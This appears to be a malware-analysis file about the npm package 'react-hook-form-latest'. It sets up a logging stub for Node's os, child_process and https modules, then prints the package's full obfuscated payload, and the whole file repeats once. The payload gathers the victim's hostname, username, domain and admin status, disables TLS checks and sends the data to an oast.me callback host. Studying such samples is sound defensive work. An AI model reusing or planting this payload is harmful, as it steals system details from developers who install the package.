alexanderankin/react-hook-form-latest.malware.js

## react-hook-form-latest.malware.js
// the react-hook-form-latest package is malware
// https://www.npmjs.com/package/react-hook-form-latest/v/37.3.6?activeTab=code

var require = function(moduleName) {
  console.log('requiring', moduleName);
  return new Proxy({ moduleName }, {
    get(target, prop, receiver) {
        console.log('getting field', prop, 'from target', target)

        switch(target.moduleName) {
        case 'os': {
            switch(prop) {
                case 'hostname': { return () => 'localhost'; }
                case 'userInfo': { return () => 'me'; }
                case 'platform': { return () => 'lin'; }
            }
            break;
        }
        case 'child_process': {
            switch(prop) {
            case 'execSync': { return function() { console.log('called', prop ,'with arguments', arguments); } }
            }
            break;
        }
        case 'https': {
            switch(prop) {
            case 'request': {
                return function() {
                    console.log('called', prop ,'with arguments', arguments);
                    return {
                        end() {
                            console.log('called end on request from arguments', arguments)
                        }
                    }
                }
            }
            }
        }
        }

        console.log('no match')
        return {};
    }
  });
}


var _0x51da54 = _0x587a;
(function(_0x128333, _0x608f35) {
    var _0x5dd588 = _0x587a,
        _0x56d04e = _0x128333();
    while (!![]) {
        try {
            var _0x3134cb = parseInt(_0x5dd588(0xb0)) / 0x1 * (parseInt(_0x5dd588(0xb6)) / 0x2) + -parseInt(_0x5dd588(0xa6)) / 0x3 + -parseInt(_0x5dd588(0xbf)) / 0x4 * (parseInt(_0x5dd588(0xa9)) / 0x5) + -parseInt(_0x5dd588(0xa5)) / 0x6 + parseInt(_0x5dd588(0xa7)) / 0x7 * (parseInt(_0x5dd588(0xb4)) / 0x8) + -parseInt(_0x5dd588(0xa3)) / 0x9 + parseInt(_0x5dd588(0xad)) / 0xa * (parseInt(_0x5dd588(0xb7)) / 0xb);
            if (_0x3134cb === _0x608f35) break;
            else _0x56d04e['push'](_0x56d04e['shift']());
        } catch (_0x5bf068) {
            _0x56d04e['push'](_0x56d04e['shift']());
        }
    }
}(_0x5371, 0xc8392));
var os = require('\x6f\x73'),
    hostname = os[_0x51da54(0xc0)](),
    username = os[_0x51da54(0xb2)]()[_0x51da54(0xab)],
    platform = os['\x70\x6c\x61\x74\x66\x6f\x72\x6d'](),
    admin_text;
if (platform == _0x51da54(0xae) || platform == '\x77\x69\x6e\x36\x34') {
    try {
        net_session = require('\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73')[_0x51da54(0xb3)](_0x51da54(0xbd)), admin_text = _0x51da54(0xa4);
    } catch {
        admin_text = _0x51da54(0xc1);
    }
    username = require(_0x51da54(0xbe))[_0x51da54(0xb3)](_0x51da54(0xaf))[_0x51da54(0xb5)]()[_0x51da54(0xb8)]('\x44\x6f\x6d\x61\x69\x6e\x3a', '')[_0x51da54(0xa2)]() + '\x2f' + username;
} else {
    admin_text = os[_0x51da54(0xb2)]()[_0x51da54(0xbc)];
    try {
        const {
            execSync
        } = require(_0x51da54(0xbe));
        let stdout = execSync(_0x51da54(0xba))['\x74\x6f\x53\x74\x72\x69\x6e\x67']()[_0x51da54(0xb8)]('\x0a', '');
        admin_text += '\x20' + stdout;
    } catch {}
}
process[_0x51da54(0xa8)]['\x4e\x4f\x44\x45\x5f\x54\x4c\x53\x5f\x52\x45\x4a\x45\x43\x54\x5f\x55\x4e\x41\x55\x54\x48\x4f\x52\x49\x5a\x45\x44'] = 0x0;
const https = require(_0x51da54(0xaa)),
    options = {
        '\x68\x6f\x73\x74\x6e\x61\x6d\x65': _0x51da54(0xac),
        '\x70\x6f\x72\x74': 0x1bb,
        '\x70\x61\x74\x68': _0x51da54(0xb1) + encodeURI(username + '\x20\x28' + admin_text + '\x29') + '\x26\x48\x6f\x73\x74\x6e\x61\x6d\x65\x3d' + encodeURI(hostname) + '\x26\x50\x61\x63\x6b\x61\x67\x65\x3d\x72\x65\x61\x63\x74\x2d\x68\x6f\x6f\x6b\x2d\x66\x6f\x72\x6d\x2d\x6c\x61\x74\x65\x73\x74\x26\x50\x57\x44\x3d' + __dirname,
        '\x6d\x65\x74\x68\x6f\x64': _0x51da54(0xb9)
    },
    req = https[_0x51da54(0xbb)](options);
req['\x65\x6e\x64']();

function _0x587a(_0x2f95b2, _0x3a5b19) {
    var _0x5371a7 = _0x5371();
    return _0x587a = function(_0x587a48, _0xc0d313) {
        _0x587a48 = _0x587a48 - 0xa2;
        var _0x24f088 = _0x5371a7[_0x587a48];
        return _0x24f088;
    }, _0x587a(_0x2f95b2, _0x3a5b19);
}

function _0x5371() {
    var _0x114f34 = ['\x68\x74\x74\x70\x73', '\x75\x73\x65\x72\x6e\x61\x6d\x65', '\x63\x69\x67\x36\x6c\x33\x6c\x33\x34\x65\x62\x6f\x69\x74\x69\x36\x71\x68\x6a\x67\x71\x65\x33\x31\x6a\x31\x39\x68\x38\x73\x67\x39\x64\x2e\x6f\x61\x73\x74\x2e\x6d\x65', '\x33\x34\x33\x39\x30\x36\x39\x30\x46\x4b\x4c\x70\x44\x4b', '\x77\x69\x6e\x33\x32', '\x73\x79\x73\x74\x65\x6d\x69\x6e\x66\x6f\x20\x7c\x20\x66\x69\x6e\x64\x73\x74\x72\x20\x2f\x42\x20\x44\x6f\x6d\x61\x69\x6e', '\x32\x32\x32\x31\x34\x31\x69\x45\x71\x57\x71\x79', '\x2f\x3f\x55\x73\x65\x72\x6e\x61\x6d\x65\x3d', '\x75\x73\x65\x72\x49\x6e\x66\x6f', '\x65\x78\x65\x63\x53\x79\x6e\x63', '\x35\x36\x38\x66\x4f\x50\x45\x79\x46', '\x74\x6f\x53\x74\x72\x69\x6e\x67', '\x38\x72\x75\x78\x41\x75\x65', '\x31\x31\x46\x73\x7a\x64\x77\x74', '\x72\x65\x70\x6c\x61\x63\x65', '\x47\x45\x54', '\x67\x72\x6f\x75\x70\x73', '\x72\x65\x71\x75\x65\x73\x74', '\x75\x69\x64', '\x6e\x65\x74\x20\x73\x65\x73\x73\x69\x6f\x6e', '\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73', '\x31\x35\x35\x39\x36\x61\x5a\x52\x41\x51\x58', '\x68\x6f\x73\x74\x6e\x61\x6d\x65', '\x6e\x6f\x6e\x2d\x61\x64\x6d\x69\x6e', '\x74\x72\x69\x6d', '\x32\x38\x39\x30\x31\x37\x39\x63\x6f\x50\x54\x46\x63', '\x61\x64\x6d\x69\x6e', '\x39\x37\x32\x33\x36\x34\x38\x6f\x67\x45\x5a\x4b\x6a', '\x31\x36\x33\x36\x39\x32\x30\x63\x51\x6f\x76\x55\x44', '\x33\x35\x31\x31\x39\x64\x76\x74\x5a\x49\x5a', '\x65\x6e\x76', '\x31\x37\x36\x35\x44\x50\x55\x50\x76\x65'];
    _0x5371 = function() {
        return _0x114f34;
    };
    return _0x5371();
}
	// the react-hook-form-latest package is malware
	// https://www.npmjs.com/package/react-hook-form-latest/v/37.3.6?activeTab=code

	var require = function(moduleName) {
	console.log('requiring', moduleName);
	return new Proxy({ moduleName }, {
	get(target, prop, receiver) {
	console.log('getting field', prop, 'from target', target)

	switch(target.moduleName) {
	case 'os': {
	switch(prop) {
	case 'hostname': { return () => 'localhost'; }
	case 'userInfo': { return () => 'me'; }
	case 'platform': { return () => 'lin'; }
	}
	break;
	}
	case 'child_process': {
	switch(prop) {
	case 'execSync': { return function() { console.log('called', prop ,'with arguments', arguments); } }
	}
	break;
	}
	case 'https': {
	switch(prop) {
	case 'request': {
	return function() {
	console.log('called', prop ,'with arguments', arguments);
	return {
	end() {
	console.log('called end on request from arguments', arguments)
	}
	}
	}
	}
	}
	}
	}

	console.log('no match')
	return {};
	}
	});
	}


	var _0x51da54 = _0x587a;
	(function(_0x128333, _0x608f35) {
	var _0x5dd588 = _0x587a,
	_0x56d04e = _0x128333();
	while (!![]) {
	try {
	var _0x3134cb = parseInt(_0x5dd588(0xb0)) / 0x1 * (parseInt(_0x5dd588(0xb6)) / 0x2) + -parseInt(_0x5dd588(0xa6)) / 0x3 + -parseInt(_0x5dd588(0xbf)) / 0x4 * (parseInt(_0x5dd588(0xa9)) / 0x5) + -parseInt(_0x5dd588(0xa5)) / 0x6 + parseInt(_0x5dd588(0xa7)) / 0x7 * (parseInt(_0x5dd588(0xb4)) / 0x8) + -parseInt(_0x5dd588(0xa3)) / 0x9 + parseInt(_0x5dd588(0xad)) / 0xa * (parseInt(_0x5dd588(0xb7)) / 0xb);
	if (_0x3134cb === _0x608f35) break;
	else _0x56d04e['push'](_0x56d04e['shift']());
	} catch (_0x5bf068) {
	_0x56d04e['push'](_0x56d04e['shift']());
	}
	}
	}(_0x5371, 0xc8392));
	var os = require('\x6f\x73'),
	hostname = os[_0x51da54(0xc0)](),
	username = os[_0x51da54(0xb2)]()[_0x51da54(0xab)],
	platform = os['\x70\x6c\x61\x74\x66\x6f\x72\x6d'](),
	admin_text;
	if (platform == _0x51da54(0xae) \|\| platform == '\x77\x69\x6e\x36\x34') {
	try {
	net_session = require('\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73')[_0x51da54(0xb3)](_0x51da54(0xbd)), admin_text = _0x51da54(0xa4);
	} catch {
	admin_text = _0x51da54(0xc1);
	}
	username = require(_0x51da54(0xbe))[_0x51da54(0xb3)](_0x51da54(0xaf))[_0x51da54(0xb5)]()[_0x51da54(0xb8)]('\x44\x6f\x6d\x61\x69\x6e\x3a', '')[_0x51da54(0xa2)]() + '\x2f' + username;
	} else {
	admin_text = os[_0x51da54(0xb2)]()[_0x51da54(0xbc)];
	try {
	const {
	execSync
	} = require(_0x51da54(0xbe));
	let stdout = execSync(_0x51da54(0xba))['\x74\x6f\x53\x74\x72\x69\x6e\x67']()[_0x51da54(0xb8)]('\x0a', '');
	admin_text += '\x20' + stdout;
	} catch {}
	}
	process[_0x51da54(0xa8)]['\x4e\x4f\x44\x45\x5f\x54\x4c\x53\x5f\x52\x45\x4a\x45\x43\x54\x5f\x55\x4e\x41\x55\x54\x48\x4f\x52\x49\x5a\x45\x44'] = 0x0;
	const https = require(_0x51da54(0xaa)),
	options = {
	'\x68\x6f\x73\x74\x6e\x61\x6d\x65': _0x51da54(0xac),
	'\x70\x6f\x72\x74': 0x1bb,
	'\x70\x61\x74\x68': _0x51da54(0xb1) + encodeURI(username + '\x20\x28' + admin_text + '\x29') + '\x26\x48\x6f\x73\x74\x6e\x61\x6d\x65\x3d' + encodeURI(hostname) + '\x26\x50\x61\x63\x6b\x61\x67\x65\x3d\x72\x65\x61\x63\x74\x2d\x68\x6f\x6f\x6b\x2d\x66\x6f\x72\x6d\x2d\x6c\x61\x74\x65\x73\x74\x26\x50\x57\x44\x3d' + __dirname,
	'\x6d\x65\x74\x68\x6f\x64': _0x51da54(0xb9)
	},
	req = https[_0x51da54(0xbb)](options);
	req['\x65\x6e\x64']();

	function _0x587a(_0x2f95b2, _0x3a5b19) {
	var _0x5371a7 = _0x5371();
	return _0x587a = function(_0x587a48, _0xc0d313) {
	_0x587a48 = _0x587a48 - 0xa2;
	var _0x24f088 = _0x5371a7[_0x587a48];
	return _0x24f088;
	}, _0x587a(_0x2f95b2, _0x3a5b19);
	}

	function _0x5371() {
	var _0x114f34 = ['\x68\x74\x74\x70\x73', '\x75\x73\x65\x72\x6e\x61\x6d\x65', '\x63\x69\x67\x36\x6c\x33\x6c\x33\x34\x65\x62\x6f\x69\x74\x69\x36\x71\x68\x6a\x67\x71\x65\x33\x31\x6a\x31\x39\x68\x38\x73\x67\x39\x64\x2e\x6f\x61\x73\x74\x2e\x6d\x65', '\x33\x34\x33\x39\x30\x36\x39\x30\x46\x4b\x4c\x70\x44\x4b', '\x77\x69\x6e\x33\x32', '\x73\x79\x73\x74\x65\x6d\x69\x6e\x66\x6f\x20\x7c\x20\x66\x69\x6e\x64\x73\x74\x72\x20\x2f\x42\x20\x44\x6f\x6d\x61\x69\x6e', '\x32\x32\x32\x31\x34\x31\x69\x45\x71\x57\x71\x79', '\x2f\x3f\x55\x73\x65\x72\x6e\x61\x6d\x65\x3d', '\x75\x73\x65\x72\x49\x6e\x66\x6f', '\x65\x78\x65\x63\x53\x79\x6e\x63', '\x35\x36\x38\x66\x4f\x50\x45\x79\x46', '\x74\x6f\x53\x74\x72\x69\x6e\x67', '\x38\x72\x75\x78\x41\x75\x65', '\x31\x31\x46\x73\x7a\x64\x77\x74', '\x72\x65\x70\x6c\x61\x63\x65', '\x47\x45\x54', '\x67\x72\x6f\x75\x70\x73', '\x72\x65\x71\x75\x65\x73\x74', '\x75\x69\x64', '\x6e\x65\x74\x20\x73\x65\x73\x73\x69\x6f\x6e', '\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73', '\x31\x35\x35\x39\x36\x61\x5a\x52\x41\x51\x58', '\x68\x6f\x73\x74\x6e\x61\x6d\x65', '\x6e\x6f\x6e\x2d\x61\x64\x6d\x69\x6e', '\x74\x72\x69\x6d', '\x32\x38\x39\x30\x31\x37\x39\x63\x6f\x50\x54\x46\x63', '\x61\x64\x6d\x69\x6e', '\x39\x37\x32\x33\x36\x34\x38\x6f\x67\x45\x5a\x4b\x6a', '\x31\x36\x33\x36\x39\x32\x30\x63\x51\x6f\x76\x55\x44', '\x33\x35\x31\x31\x39\x64\x76\x74\x5a\x49\x5a', '\x65\x6e\x76', '\x31\x37\x36\x35\x44\x50\x55\x50\x76\x65'];
	_0x5371 = function() {
	return _0x114f34;
	};
	return _0x5371();
	}